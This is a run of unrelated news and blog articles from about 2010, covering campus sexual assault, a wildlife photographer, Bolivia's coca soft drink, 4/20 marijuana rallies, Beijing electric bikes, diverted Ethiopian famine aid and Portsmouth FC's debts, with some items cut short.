Practically , this can mean colleges give rapists meager punishments — as U. Mass .
Amherst did when it failed to expel a student who admitted to rape — forcing victims to run into their attackers regularly on campus .
Some , like Indiana University student Margaux J. , also profiled by the Center for Public Integrity , feel they have no choice but to drop out — while their rapists go on to graduate .
One possible solution would seem to be encouraging victims to report crimes to police rather than school officials — but , writes Kristen Lombardi of the CPI , " Prosecutors often shy away from such cases because they are " he said , she said " disputes absent definitive evidence . "
NPR 's Joseph Shapiro , who wrote about Dunn and the CPI report yesterday , says " it 's hard to sort out truth in such cases . "
And while this seems perilously close to what Feministing calls " spreading the myth of ' gray rape ' " — the idea that consent is an inherently fuzzy issue that can be interpreted in many ways — it 's also true that colleges and law enforcement alike seem unwilling or unable to effectively punish rapists .
Russlynn Ali , the Dept. of Education 's assistant secretary for Civil Rights , says she wants to pave the way for OCR to issue harsher punishments , like withdrawing federal funding from schools that fail to properly investigate assaults .
But in the meantime , writes Shapiro , some schools are looking for ways to stop rape from happening in the first place .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
One way to do this is to educate students about consent , as UCLA is doing .
Another is to challenge the kind of campus rape culture that blames victims for drinking or alleges that women file claims out of guilt or spite .
After we wrote about a particularly egregious example of victim - blaming at Princeton , examples of this culture came pouring in .
One reader sent us an advice column from the Ohio University Post , which read , in part ,
I realize that a lot of people hook up when they 're drunk , but it 's important to remember that when alcohol is involved , consent goes out the window .
If you 're putting these women under false ideas that you have a sincere interest in them and that 's what they 're looking for , you could end up in quite a bit of trouble .
It 's sad but true :
Some girls do n't handle being lied to / taken advantage of very well , and some will even throw out the " R " word ( yes , rape ) when you do n't hold up your end of the deal .
Please understand , not all women behave this way and some women really are victims of rape , but there are other women who will abuse the term .
Why take the risk ?
Advertisement
Junior Liz Herron admirably fired back :
According to the FBI , false reporting for rape is about 3 percent .
That is the same percentage for false reporting for other felonies .
Given that one in four women will experience an attempted or completed rape in their lifetime , and that 60 percent of rapes are not reported , the number of women ( or men ) who will falsely report rape is very small .
It is extremely unlikely that a woman will report rape for being lied to .
Perhaps , then , she might report rape not because she does n't " handle being lied to very well , " but because she does n't handle being raped very well .
Advertisement
Another reader pointed us to the Boston College Observer , which published a ( notably anonymous ) cartoon in response to The Vagina Monologues , titled " The end of the women 's rights movement at BC . "
The cartoon depicts a cross-eyed , hunch - backed woman whose shoe reads " Just say no ! "
Its message is frankly a little muddled , but the cartoonist seems to imply that saying no to sexual contact is something only weirdos do .
Again , though , another student was on the case , responding :
Besides being incredibly offensive , this piece illustrates The Observer 's completely misconstrued understanding of what the Women 's Rights movement is .
I 'm even confused as to what this is trying to say , that there is fault in loving one 's vagina ?
What does " Just say no ! " refer to ; consent ?
However , I would like to see how The Observer staff would draw the Feminism it approves of .
This cartoon implies that it would be a polite and quiet woman , without an opinion to voice .
That hardly seems like a step forward to me .
Advertisement
Unlike the cartoonist , this student was willing to give his name : it 's Michael Wolf .
Our hats go off to him — on college campuses , it 's all too easy to buy into the lies that women 's drinking and flirting causes rape , that women frequently report rape in order to ruin men's lives ( all too often , it 's the victim 's life and not the attacker 's that gets ruined ) , and that rape would never happen if women just behaved themselves .
Students need administrators and law enforcement officials to work actively against these lies by punishing rapes to the full extent of the law .
But they also need their peers to speak out against a social system that encourages men and women alike to pretend rape does n't exist .
It 's sad that students have to step up when their universities so often fail them — but judging by Herron and Wolf , they 're up to the challenge .
Lax Enforcement Of Title IX In Campus Sexual Assault Cases [ Center For Public Integrity ]
Campus Rape Victims : A Struggle For Justice [ NPR ]
" A Culture of Indifference " : Report On Campus Sexual Assault Reveals Inaction Taken By Schools , Education Department [ Feministing ]
When Rapists Graduate And Victims Drop Out [ Washington City Paper Sexist Blog ]
A Lack Of Consequences For Sexual Assault [ Center For Public Integrity ]
Pillow Talk : Sex Seeker Questions Morality Of Lying To Potential Hook Ups [ The Post ]
Post Letters : No One Can Consent When Under The Influence [ The Post ]
The End Of The Women 's Rights Movement At BC [ The Observer At Boston College ]
School Fails To Expel Admitted Rapist [ UPI.com ]
Advertisement
Earlier : Sexual Assault On Campus : Schools Don't Always Offer Much Assistance
" She Knew What Would Happen If She Started Drinking : " Blaming The Victim , Princeton Edition
Everyone loves a picture of a penguin .
Indeed , the one here is a particularly good example of the genre and the view through the ice reminds me of the famous picture by Herbert Ponting taken on Captain Scott 's ill - fated trip to the South Pole .
This photograph was taken by Sue Flood , a wildlife photographer , for want of a better box to put her in .
Sue 's close - up photograph of the eye of a humpback whale ( below ) recently won first prize for best single image in the Nature category in the Travel Photographer of the Year competition and her portfolio of pictures of emperor penguins was also highly commended .
As with many areas of photography wildlife photography is one where you have to know your subject inside out .
Just being able to use a camera is only the start .
Sue graduated from Durham University in 1986 with a degree in Zoology and eventually in 1993 moved to the BBC where she spent 11 years working for Natural History Unit in Bristol .
Sue was an associate producer on the award - winning BBC series The Blue Planet and also worked on Planet Earth .
But in 2005
Sue left the BBC to pursue her career as a photographer .
Many might wonder why she would leave such a great job but you will soon understand why when you see and hear about her work .
Sue said :
" I left the BBC to concentrate on my photography as I was enjoying that more than my job as a producer .
It was a good decision for me and I 'm happy to say that I have n't looked back . "
" For me , there 's no such thing as a typical year .
The only thing that is constant is the upheaval .
I feel like I have the best job in the world , but the downside is that it plays havoc with one 's personal life , taking you away from friends , family and other loved ones for far too long .
" But I ca n't complain - it 's a job which has given me the opportunity to travel to some extraordinary parts of our wonderful planet , from the North Pole to the Antarctic and in between , and to meet some remarkable people . "
So what came first , the passion for photography or wildlife and conservation ?
" What came first for me was the passion for wildlife .
As a child , like my former colleagues in the BBC Natural History Unit , I was fascinated by the programmes presented by David Attenborough .
I devoured them voraciously , and these wonderful documentaries certainly inspired my choice of wildlife film - making and photography as a career .
So when I eventually got the chance to work with David it was better than winning the lottery .
He is an amazing and lovely man , and an absolutely inspiration .
" However , I was also inspired by my father , Howard Flood ( pictured ) , whose tales from his adventures in Burma , China , Japan and Indonesia in the merchant navy as an engineer with Blue Funnel line in the 1950s seemed incredibly exotic to me as a child growing up in North Wales .
" But I always tease him that , although Dad was a keen photographer , he seemed to have thousands of photos of seagulls around the world - usually a tiny white speck in a blue sky .
So it 's a good job I inherited his love of travel and not his photographic skills . "
This picture of a great white shark , apart from being a striking picture also marked a moment in Sue 's career , the move from film to digital .
Sue said :
" This was the shot ( above ) that convinced me to move from film to digital !
I was shooting great white sharks in a cage with my good friend presenter and author Mark Carwardine off Guadalupe in Mexico .
I had two film cameras round my neck , while Mark was shooting digital .
After a couple of close passes by this shark I had finished my two rolls of 36 and Mark just carried on shooting .
" However I 'm also very fond of this shot as it was the first one I had published on a magazine cover . "
Your underwater pictures are stunning , but for the average person probably not accessible , any tips for taking wildlife pictures in a more mundane setting ?
" Think about how to frame your subject .
Try to see things in a different way .
Get down on your stomach to get a low - level shot , if necessary , or look for an unusual angle .
There is beauty all around - you just have to know where to look .
" And you do n't need an expensive camera to get a great shot .
I 've seen some wonderful shots taken on inexpensive point and press cameras , and some very mediocre work produced by people who have every conceivable camera gadget known to humankind . "
You 've taken pictures of many things , what subject keeps drawing you back ?
" My favourite subject has to be polar bears in the northern hemisphere and either humpbacks in the South Pacific or emperor penguins , if you want a colder location .
All amazingly charismatic , photogenic and very challenging , each in their own way , to shoot .
" The photograph to the right was part of my highly commended portfolio in the Travel Photographer of the Year 2009 competition .
I had to wait a long time for this pose .
I 'd been in the colony all day when the second adult returned to feed the chick .
They held this pose for a just a few seconds and then it was gone .
" The next picture shows a breaching humpback whale at Vava'u Island , Kingdom of Tonga in the South Pacific .
It was taken in the last hour of a 10 - week shoot when this humpback breached right next to our boat .
I spun round and grabbed this before he crashed back into the deep blue .
I love this shot - I feel it conveys the amazing power of these giant marine mammals - 45 ft of whale throwing itself into the air next to your tiny boat is an impressive sight . "
" Another favourite is this one of a polar bear stalking a seal in Franz Josef Land , Russian Arctic .
I like this shot as it captures the bear at home in its environment .
The bear remained motionless for almost an hour as it stalked the seal .
This was taken on my 600 mm Canon lens - but I 've also woken up in my tent on the Arctic sea ice to find polar bear tracks around my tent .
I 'd have needed the wide angle for that bear , if I 'd been awake . "
" However , I have to mention elephants too .
I had a wonderful shoot in Hwange National Park in Zimbabwe , shooting stills for Discovery Channel , and it was a huge privilege to observe these extraordinarily close - knit family groups going about their daily lives .
Magical .
" This photo was awarded the Silver Medal of the Royal Photographic Society in their 2008 Projected Image competition for Nature shots .
The light was stunning - the sun was setting , the dust was blowing in the wind and I was able to grab a few photographs as the elephant family approached the waterhole .
Their excitement at finding water was evident . "
" I 've had a number of close encounters - some too close for comfort .
When shooting in Tonga for Planet Earth , I was on the receiving end of a very hefty blow from the fluke of a " baby " humpback whale - all one ton of him !
" He certainly was n't aggressive - just curious .
He swam over to take a look at me from close quarters , then turned and unfortunately caught my leg with his fluke , bending my ankle backwards at an unnatural angle and leaving me with a badly bruised leg - rather like being hit with a sledgehammer I imagine .
" But I have to say that swimming alongside the humpbacks of Tonga was one of the highlights of my life .
To look these enormous , intelligent and gentle marine mammals in the eye from just inches away and have them inspect you in return makes the hair stand up on the back of my neck just to remember it .
Awesome in the true sense of the word . "
To round off here are a few more of Sue 's remarkable pictures .
Russian nuclear icebreaker the Yamal at the North Pole for Quark Expeditions .
This picture shows a sign at the North Pole and was captured on a Canon IDS II with 14 mm lens .
It was taken during a tour that Sue works on .
As the Pole is sea water they have to take the sign with them so the tourists can be photographed alongside it .
" The last picture here shows people standing on top of Ross Ice Shelf in Antarctica .
This is Antarctica 's largest ice shelf and is the size of France .
The shot was taken from the co-pilot seat of Russian helicopter on semi-circumnavigation of Antarctica with Quark Expeditions in December 2008 .
It 's one of my favourite shots , and part of my winning portfolio from the International Photographer of the Year 2009 competition , when I won the travel and tourism section . "
You can read more about Sue 's work and see an extended range of her pictures on her website www.sueflood.com.
Sue is represented by Getty Images , as well as the Nature Picture Library .
I posted a glimpse of this on Confessions the other day .
My sister and I left New York Sunday to head to our mom ’s house and I got a chance to see some incredible views from the plane .
By Andres Schipani
BBC News , La Paz , Bolivia
The beverage has a red - and - white label , tastes ultra-sweet , gives you a buzz and - says its producer - it keeps you awake .
But it is not the drink with similar effect and a similar name you might think it is .
An unlikely newcomer has made the world of soft drinks a little more crowded : Bolivia has started producing a new fizzy drink using the coca leaf .
It is called " Coca Colla " after the Colla people , the Andean tribes who cultivate coca in the areas bordering Bolivia , Chile and Argentina .
For some a matter of indigenous pride , for others another sign of Bolivia 's growing anti-US feelings , this humble local initiative has set its sights on competing domestically with giants such as Coca - Cola and Red Bull .
I started making the drink at home , based on my beloved but otherwise reviled coca leaf and outsourcing the bottling process
Coca Colla creator Victor Ledezma
The new " energy soft drink " is made by a private company , with a modest initial investment of a $ 1,000 ( £ 650 ) , but it is backed up by a government policy of industrialising the cultivation of the coca leaf .
The leaf is a key element in the Andean people 's culture and economy .
However , it is also cocaine 's raw material .
That association with drugs is a motivating influence on the drink 's creator Victor Ledezma .
" I want to get to the whole world with my coca - leaf - based drink , " says Ledezma , a coca farmer from El Chapare region in central Bolivia .
" Coca has a lot of potential this can change the image of Bolivia as being a drug - trafficking country , " he believes .
According to Mr Ledezma , Bolivia 's new ally , Iran , has already expressed an interest , having ordered two million bottles .
And some countries in the region , members of the left - wing Alba bloc - mainly Venezuela and Paraguay - are considering not only importing , but also financing Mr Ledezma 's project .
" I 've developed my own secret formula .
I started making the drink at home , based on my beloved but otherwise reviled coca leaf and outsourcing the bottling process , " Mr Ledezma says .
" Now we are building a plant in Santa Cruz and aiming to have investments for at least $ 1 m .
That 's for a start .
The whole world should know that coca , besides from its good taste , is good for body and the soul , " Mr Ledezma adds .
Kicking ingredient
This is great for Bolivia and will be great for the coca leaf , because then people wo n't only talk just about the negative side of coca - derived products
Bolivian government source
Beverages derived from coca leaves are not a new idea .
In the late 1800s and early 1900s , an entrepreneur from Corsica , Angelo Mariani , sparked a revolution with his coca - based wine , ' Vin Mariani ' .
The drink offered " health , strength , energy and vitality " and was even awarded official recognition by one of its consumers and fans , the then Pope Leo XIII .
Most recently , coca leaves seem to be among the elements in the formula of the Red Bull Cola energy drink .
But most famously , coca leaves helped to give the kick in Coca - Cola 's original formula .
The company dropped cocaine from its recipe more than 100 years go , but the secret formula still calls for a cocaine - free coca extract .
The Coca -Cola Company is said to import eight tons of coca leaves from South America each year , mainly from Peru .
" The coca leaf has three alkaloids .
Extracted from the leaf and concentrated into cocaine with chloride , the coca alkaloid is highly stimulating and , potentially , very addictive , " explains Dr Jorge Hurtado , a local psychiatrist and coca expert who heads the International Coca Research Institute .
" However , the small dose present naturally , and unprocessed , in coca leaves provides only a slight energising sensation and it is not addictive ; it carries less of a kick than a cup of coffee .
" The same applies to the Coca Colla or other coca - based products like toothpaste , flours or sweets , " Dr Hurtado adds .
Trade ban Even so , with the notable exception of Coca - Cola , most products using coca leaves are banned in most nations beyond the Andes by strict trade regulations .
President Morales chewed coca leaves at the UN while campaigning against a ban So for Coca Colla , exporting the beverage widely would require the International Narcotics Control Board of the United Nations to take the coca leaf off the list of dangerous drugs , where it has been since 1961 .
And it would also require modifying the current local law , which prevents exports of any product derived from the coca plant .
Bolivian President Evo Morales has yet to indicate whether the law will change .
But Mr Morales , himself a coca grower , has fought for the rights of coca growers and called for the United Nations to lift the ban on coca , criticising the US for its opposition to any change .
Yet Bolivian law currently allows only 12,000 hectares of coca plants to be planted and its purposes must be traditional - for chewing , for tea and for use in indigenous rituals .
But with widespread plans of industrialisation of the shiny green leaf , Mr Morales is pushing to increase the area used to grow coca to 20,000 hectares .
In reality , coca cultivation is far greater than that .
A recent report published by the United Nations Office on Drugs and Crime states that , in 2008 , approximately 30,200 hectares of coca were under cultivation in two out of the country 's nine departments .
The reality is that coca leaves fetch far higher prices than most food crops and cultivation is hard to resist for farmers in one of South America 's poorest countries .
The government 's hope is that , by supporting coca 's other uses , it will help some farmers avoid the temptation of cocaine trade .
It says legal coca production makes enough to support 300,000 people .
A government source told the BBC that they were in the final stages of analysing the product and would soon provide financial support to its producers .
" The aim is to provide greater social benefits to producers and suppliers of the raw material .
" This is great for Bolivia and will be great for the coca leaf , because then people wo n't only talk just about the negative side of coca - derived products " , the source said .
" And there 's more to it than that .
This is a matter of national pride .
Soon , people will stop talking about ' God , Country and Coca - Cola ' ; they 'll be talking of ' [ Andean Goddess ] Mother Earth , Bolivia and Coca Colla . ' "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
High times for American marijuana smokers as police allow thousands of ' 4/20 ' pot protesters to light up across the country
Marijuana smokers across the America lit up in public parks , outside statehouses and in the posh confines of a Hummer parked outside a pot gardening superstore to observe the movement 's annual ' high holiday ' yesterday .
Those who were n't within whiffing distance of a college campus or a reggae concert may not have realised that Tuesday was ' 4/20 ' , the celebration - cum - mass civil disobedience derived from ' 420 ' - insider shorthand for cannabis consumption .
Smoke gets in your eyes :
An estimated 12,000 to 15,000 people all exhale marijuana smoke as the clock hit 4.20 pm during the 4/20 event on Norlin Quad at the University of Colorado in Boulder
Oversized : A giant marijuana joint is lit at Golden Gate Park in San Francisco .
Marijuana legalisation advocates lit up across the country during the annual observance of 4/20
Advocates from New Hampshire to California trumpeted marijuana 's rising commercial and political acceptance while producing collective clouds of pungent smoke - often under the watchful eyes of law enforcement officers who for the most part let the parties proceed .
A daylong rally in Denver 's Civil Centre Park drew thousands of people , as did the public smoking event that persisted at the University of Colorado in Boulder despite discouragement from college administrators .
Colorado politicians coincidentally marked the day by backing new regulations for dispensaries selling medical marijuana .
In New Hampshire , about 100 people rallied in the state capital of Concord on the eve of a Senate vote to decriminalise small amounts of pot .
Shocking : A young boy smokes a hash pipe while attending the annual 420th smoke - in at the Art Gallery in Vancouver , British Columbia
' Mary Jane ' : Marijuana smoke rises from a crowd in front of the state capitol building in Denver .
Colorado is one of 14 states to allow use of medical marijuana - which is know as ' Mary Jane ' to users
Some lit up joints as state troopers watched from inside the Statehouse .
Governor John Lynch said he will veto the bill if it reaches him .
In Juneau , Alaska , about 20 young people , two dogs and a mother pushing a stroller marched in driving rain , whooping and chanting , ' Yes we cannabis ! ' - a play on Barack Obama 's campaign slogan .
Their route took them past the state Capitol and City Hall .
In California , where voters in November will consider whether to tax the sale of marijuana for recreational use , a three - month - old cultivation equipment emporium in Oakland got a 24 - hour jump start , sponsoring a ' 420 Eve ' festival on Monday .
Hey , bud : A man smokes a marijuana blunt - the drug wrapped up inside a cigar casing - at Golden Gate Park in San Francisco yesterday afternoon
Save yourself : A street preacher has marijuana smoke puffed in his face as he confronts marijuana smokers at Golden Gate Park
Hits from the bong : A woman wears a marijuana joint costume in San Francisco 's Golden Gate Park .
Right , pot for sale at the Art Gallery in Vancouver , British Columbia
Several hundred revelers lined up outside the 15,000sq ft iGrow ' hydroponics superstore ' .
Security guards kept them at bay until 4.20 pm , when they could enter a medical marijuana delivery service raffle to win an giant joint and a tour of a 53ft long portable grow room with a starting price of $ 60,000 .
' I would n't have thought we would be able to consume on site , ' marveled John Corral , 19 , of San Jose , after he obtained a wristband that gave him access to the event 's two ' vapour lounges , ' the one inside the Hummer and another inside a companion Range Rover limousine .
Two years ago , before he had a doctor 's recommendation to smoke pot , Corral commemorated 4/20 on Hippie Hill , the Golden Gate Park promontory where an earlier generation of pot aficionados made their stand .
Marijuana use - medically and recreationally - is getting more attention these days , with voters in California and possibly three other states set to decide whether to legalize adult use of the drug .
Not all peace and love : A man gets kicked in the head as protesters fight during a celebration of marijuana in Yonge and Dundas Square in Toronto
Going downtown : Police arrest the man during a rally for the legalization of marijuana after a gun was seized in an altercation in Toronto
South Dakota voters will consider in the fall whether to join California and the 13 other states that allow medical cannabis use .
Most Americans still oppose legalising marijuana , but larger majorities believe pot has medical benefits and the government should allow its use for that purpose , according to an Associated Press - CNBC poll released yesterday .
Allen St. Pierre , executive director of the National Organisation for the Reform of Marijuana Laws , said the drug 's steady movement from counterculture indulgence to mainstream acceptance was evident on Tuesday , when four cable television channels dedicated ' a good chunk of programming to 420 ' .
St. Pierre said that with the terms ' marijuana ' or ' cannabis ' regularly showing up on the top Internet searches , it 's clear that groups like his , which has lobbied to decriminalize marijuana since 1970 , are no longer blowing smoke .
Toke that : A woman passes a arge joint at a pro-marijuana ' 4/20 ' celebration in front of the state capitol building in Denver
Pain relief : Tracey
Wood lights a pipe filled with medical marijuana for her boyfriend Micah Moffet in Denver
' There is a large mainstreaming of all of this , ' he said .
' Some of it is happening because commercial entities looking to comport with local social mores and values are taking advantage of this bizarre numerology . '
There are a variety of stories about the origin of 420 , but pot advocates generally attribute the term to the time when a group of San Francisco Bay area high schoolers would gather to smoke marijuana during the early 1970s .
The term was then popularised by High Times magazine and the Grateful Dead .
At the iGrow event , Tom Patton of GrowOp Technology , proudly discussed the inspiration for the ' Big Bud ' growing trailer he developed with Derek Peterson , a former stock broker .
A pot protester , Rich Hall , takes a puff of a marijuana joint in front of the Statehouse in Concord , New Hampshire
A haze of marijuana settles on the crowd at the University of Colorado in Boulder , Colorado
Patton said he kept hearing about pot growers who ' were constantly putting up and taking down ' grow rooms built inside warehouses or residential homes because of complaints from neighbours , fires sparked by faulty wiring or threats of law enforcement raids .
His pot room on wheels , which comes outfitted with a security system and technology to adjust temperature and humidity levels from an iPhone , may not completely eliminate the last concern , but that has n't stopped a pair of New York bankers from investing in the invention .
' This is an enabling technology , not a hiding - out technology , ' Patton said .
The lure of revenue and respectability has prompted some veterans of the marijuana wars to diversify .
Joshua Freeman , a Sonoma County pot grower , was at the 420 Eve festival handing out samples of the specialty plant food he recently developed and is trying to market .
' We are not just a bunch of stoners sitting back on a couch playing video games , ' Freeman said .
A marijuana user smokes during a 420 Day celebration on " Hippie Hill " in Golden Gate Park , San Francisco .
April 20th has become a de facto holiday for marijuana advocates , with large gatherings and ' smoke outs ' in many parts of the United States
Voters in California will consider a measure on the November general election ballot that could make the State the first in the nation to legalise the growing of a limited amount of marijuana for private use
OECD , Organization for Economic Co-Operation and Development , has released a report for policy makers assessing the level of IP v6 deployment around the world .
" [ T ] he timely deployment of IPv6 by network operators and content / application providers is an increasing priority for all Internet stakeholders .
In terms of public policy , IPv6 plays an important role in enabling growth of the Internet to support further innovation .
In addition , security , interoperability and competition issues are involved with the depletion of IPv4 . "
Key findings from the report are :
Watching the Red Carpet interviews is sort of like watching old people hump .
Â
It ’s slow , boring , and you just sort of want it to be over quickly .
Â
But then someone like Gary Busey rolls up , and it almost makes watching an 80 year old set of balls clap against some floppy granny ass cheeks worth it .
Â Seriously Gary , let ’s do some Peyote together .
[ flv:http://regretfulmorning.com/wp-content/uploads/2010/03/busey.mp4 600 400 ]
The first MeeGo release
[ Distributions ] Posted Mar 31 , 2010 18:24 UTC ( Wed ) by corbet
The first release of the MeeGo distribution ( formerly known as Maemo and Moblin ) has been announced ; this is also , they say , the beginning of a more open approach to MeeGo development .
" What are we opening ?
The MeeGo distribution infrastructure and the operating system base from the Linux kernel to the OS infrastructure up to the middleware layer .
The MeeGo architecture is based on a common core across the different usage models , such as netbooks , handheld , in- vehicle , and connected TV .
The MeeGo common core includes the various key subsystems including the core operating system libraries , the comms and telephony services , internet and social networking services , visual services , media services , data management , device services , and personal services . "
There are downloadable images for Nokia N900 phones and Intel - based netbooks .
Full Story ( comments : 5 )
By Michael Bristow
BBC News , Beijing
Competition between bike makers is becoming fierce Office worker David Dai is one of a growing army of Beijing residents returning to two - wheeled transport .
But the 28 - year - old does not rely on his own pedal power - like hundreds of thousands of others , he has bought an electric bike .
These battery - powered , and virtually silent , machines have become increasingly common on the streets of the Chinese capital .
With roads often clogged with cars - there are now four million vehicles in Beijing - they offer a speedy way to get around .
But not everyone seems to like them : government officials are unsure about how to deal with this explosion of electric bicycles .
Congested streets China used to be known as the " kingdom of bicycles " .
In the 1980s , four out of five commuters pedalled to work on them in Beijing .
But as the capital 's residents became richer following economic development , they ditched their bikes for four - wheeled transport .
Recent statistics suggest that only one in five city residents now use an ordinary bicycle to travel around .
In a matter of just a few years Beijing has gone from a city with few private cars to one where traffic jams are commonplace .
But many Beijing residents are now buying electric bicycles to avoid wasting time on congested streets .
" It takes only 10 minutes to ride my electric bike from home to work , " said Mr Dai .
Hundreds of thousands of people have bought electric bicycles " If I took the bus , I 'd have to spend time waiting for it , and then I could be trapped in a traffic jam .
It could take me half an hour to make the same journey . "
These bikes are on sale everywhere , with shops sometimes clustered together .
Their wares are lined up on the pavement in neat rows .
Zhang Zhiyong , the manager of a store selling a brand of electric bike called " Capital Wind " , said it is easy to see why sales are booming .
" Beijing is not like other smaller cities - it 's big .
If people ride their bicycles to work , they get really tired .
If they drive to work , the roads are often congested , " he told the BBC .
" But an electric bike is environmentally friendly and convenient .
Promoting the use of these bikes would benefit us all . "
And they are much cheaper than cars .
The most expensive model in Mr Zhang 's shop is only 2,680 yuan ( $ 390 : £ 260 ) .
Public outcry
But not everyone is convinced by the shop owner 's argument .
Many ordinary bike riders complain that the fast , silent electric bikes that now whizz about the city are a menace to other road users .
Late last year the government announced it was going to issue guidelines on what could be considered an electric bike .
Officials initially planned to bring in rules that defined an electric bike as a something weighing less than 40kg and travelling at less than 20 kmh .
A bicycle that was heavier and travelled faster would be considered an electric motorbike .
Bicycles once used to rule the roads in central Beijing
The owners of these larger machines would have to get a licence , register their motorbikes and buy insurance .
But the government scrapped the introduction of the new guidelines after a public outcry .
" There 's been a big debate in China about exactly how to deal with electric bikes , " said Vance Wagner , who works for a transport research centre linked to China 's Ministry of Environmental Protection .
But with the number of electric bicycles increasing all the time , the government might find it hard to put off forever a decision on how to classify them .
" Many people do n't realise that the population of electric bikes is actually growing way faster than the population of cars , " explained Mr Wagner .
The sale of electric bikes has slightly dropped off recently as people wait to see how the government will tackle the problem of how to define one .
But , ultimately , it is something else that might kill off sales .
Some experts believe they are a stop - gap form of transport ; a link between an ordinary bike and a car .
As Beijing car owner Richard Liu put it , cars give a clue to a person 's status - the more successful they are , the bigger the car they own .
" I think 80 % of Chinese people want to have a car , even if they do n't have much money they will buy cheaper ones , " he said .
So while they are popular now , electric bicycles might one day prove as unwanted as the pedalled variety .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Gebremedhin Araya ( L ) says he posed as a merchant , but was in fact a rebel
By Martin Plaut
Africa editor , BBC World Service
Millions of dollars in Western aid for victims of the Ethiopian famine of 1984 - 85 was siphoned off by rebels to buy weapons , a BBC investigation finds .
Former rebel leaders told the BBC that they posed as merchants in meetings with charity workers to get aid money .
They used the cash to fund attempts to overthrow the government of the time .
One rebel leader estimated $ 95 m ( £ 63 m ) - from Western governments and charities - was channelled into the rebel fight .
Please turn on JavaScript .
Media requires JavaScript to play .
The CIA , in a 1985 assessment entitled Ethiopia : Political and Security Impact of the Drought , also alleged aid money was being misused .
Its report concluded : " Some funds that insurgent organisations are raising for relief operations , as a result of increased world publicity , are almost certainly being diverted for military purposes . "
Multiple rebellions
The crisis in 1984 prompted a huge Western relief effort .
Although millions of people were saved by the aid that poured into the country , evidence suggests not all of the aid went to the most needy .
ETHIOPIA FAMINE
Roughly one million Ethiopians died from results of famine Disaster exacerbated by civil war At the time , the Ethiopian government was fighting rebellions in the northern provinces of Eritrea and Tigray .
Much of the countryside was outside of government control , so relief agencies brought aid in from neighbouring Sudan .
Some was in the form of food , some as cash , to buy grain from Ethiopian farmers in areas that were still in surplus .
Max Peberdy , an aid worker from Christian Aid , carried nearly $ 500,000 in Ethiopian currency across the border in 1984 .
He used it to buy grain from merchants and believes that none of the aid was diverted .
" It 's 25 years since this happened , and in the 25 years it 's the first time anybody has claimed such a thing , " he says .
He insists that , to the best of his knowledge , the food went to feed the starving .
CIA INTELLIGENCE
Some funds that insurgent organisations are raising for relief operations , as a result of increased world publicity , are almost certainly being diverted for military purposes
Read the entire document
But the merchant Mr Peberdy dealt with in that transaction claims he was , in fact , a senior member of the Tigray People 's Liberation Front ( TPLF ) .
" I was given clothes to make me look like a Muslim merchant .
This was a trick for the NGOs , " says Gebremedhin Araya .
Underneath the sacks of grain he sold , he says , were sacks filled with sand .
He says he handed over the money he received to TPLF leaders , including Meles Zenawi - the man who went on to become Ethiopia 's prime minister in 1991 .
Mr Meles , who is still in office , has declined to comment on the allegations .
But Mr Gebremedhin 's version of events is supported by the TPLF 's former commander , Aregawi Berhe .
Now living in exile in the Netherlands , he says the rebels put on what he describes as a " drama " to get the money .
" The aid workers were fooled , " he says .
He says that some $ 100 m went through the hands of the TPLF and affiliated groups .
Some 95 % of it was allocated to buying weapons and building up a hard - line Marxist political party within the rebel movement .
Both Mr Aregawi and Mr Gebremedhin fell out with the TPLF leadership and fled the country .
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement Much of the money that ended up in the TPLF 's hands was channelled through affiliated groups such as the Relief Society of Tigray .
Soviet confrontation
It should not be forgotten that this all took place at the height of the Cold War .
The Soviet Union had poured $ 4bn into Ethiopia , and provided Soviet officers to direct Ethiopia battles against the rebels .
ASSIGNMENT
Assignment is a weekly current affairs programme reporting from locations around the globe for the BBC World Service
It is first broadcast on Thurday at 1005 GMT , and repeated at various times throughout the week
It is also available to download as a podcast .
In January 1983 , President Ronald Reagan issued National Security Directive 75 , which aimed to confront the Soviet Union across the developing world .
" US policy will seek to limit and destabilise activities of Soviet Third World allies and clients , " it said .
In a November 2009 speech , US Secretary of Defence Robert Gates - who was deputy head of the CIA during Mr Reagan 's time in office - said that the president 's approach was to " impose ever stiffer costs on the Soviet Union for its Third World adventurism " .
He included Ethiopia among the states in which " Soviet surrogates soon faced their own lethal insurgencies " .
Mr Gates was unwilling to expand on whether the US backed the Ethiopian insurgents .
But since there were only a limited number of rebel movements , the suggestion cannot be ruled out that the CIA not only knew about , but supported , the diversion of aid funds to the TPLF .
Correction 4 November 2010 : This page has been amended following a complaint by the Band Aid Trust , which was upheld by the BBC's Editorial Complaints Unit .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Portsmouth will pay Tottenham Hotspur £ 1 m over the aborted transfer of a player who has never been near the home dressing room at White Hart Lane , while hundreds of small creditors will have to settle for a fraction of what they are owed .
This is just one of the shocking findings revealed in a report prepared by the club 's administrator for their creditors .
The dossier lays bare the financial mismanagement and chaotic decision - making that left Portsmouth £ 108.6 m in debt and will leave hundreds out of pocket .
An additional £ 14.2 m in transfer fees are due to the club but have already been taken up front , making overall debts of £ 122.8 m .
Andrew Andronikou , the administrator , said tonight : " If you 're saying the club owes £ 122 m , yes it does .
But it depends on the context .
Around £ 90 m of the £ 122 m will be going into the CVA [ the Company Voluntary Arrangement , which settles what percentage of the unsecured debts the club will have to pay ] . "
In what could well become a pub quiz question in years to come , Portsmouth agreed with Daniel Levy , the Tottenham Hotspur chairman , to pay the seven - figure fee for Asmir Begovic , the goalkeeper sold to Stoke City for £ 3.25 m in January .
The transfer was concluded during a frenzied period when the club were teetering on the brink of insolvency , fending off a winding - up petition from Her Majesty 's Revenue and Customs and trying to sell players during a brief window during which a Premier League transfer embargo had been lifted .
Described by insiders as a " Keystone Kops " period of wheeler - dealing , the negotiations were being led by Daniel Azougy , the convicted Israeli fraudster employed to run the club 's finances by the Falcondrone consortium that took control in October , and Mark Jacob , the solicitor then employed as executive director .
Shortly afterwards Balram Chainrai was repaid £ 4 m of the £ 18.5 m he had lent the club and subsequently took full control .
It is understood the club initially agreed a combined fee with Spurs for Younes Kaboul and the promising Bosnian goalkeeper , but agreed to a clause promising that if Begovic went elsewhere they would pay Spurs a £ 1 m fee in compensation .
When the club subsequently agreed to sell Begovic to Stoke City following a protracted negotiation , the £ 1 m fee kicked in and was due to be paid by the end of last month .
